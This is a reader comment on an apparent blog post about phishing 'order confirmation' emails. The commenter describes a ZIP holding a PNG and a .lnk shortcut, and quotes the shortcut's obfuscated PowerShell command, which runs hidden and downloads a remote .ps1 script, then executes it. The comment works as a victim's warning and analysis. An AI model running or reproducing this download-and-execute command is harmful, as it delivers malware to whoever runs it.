Comments

New Order Confirmation with recipients full details tries to deliver malware — 1 Comment

  1. Hi

    I got one of these today. It’s the first time I see my real home address (albeit incomplete) on malware.

    The “order confirmation” email is convincing enough to make me wonder where the order came from and click on the only link they present. It leads to a ZIP file, which is how I became properly suspicious. It contains a PNG image file and a .lnk. I had a look at the properties of that lnk and it’s calling a powershell script (I deleted the C from the full path):

    :\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -ep unrestricted -nop -command iex ((n`E`w-ObJ`ect (‘NE’+’t.wE’+’BCl’+’ieNt’)).(‘DoWn’+’LoA’+’dStr’+’inG’).invoKe((‘ht’+’tps:/’+’/assoc’+’iativl’+’.com/’+’orders/’+’mize’+’ry.’+’ps’+’1′)));

    Clever!

Leave a Reply

Your email address will not be published. Required fields are marked *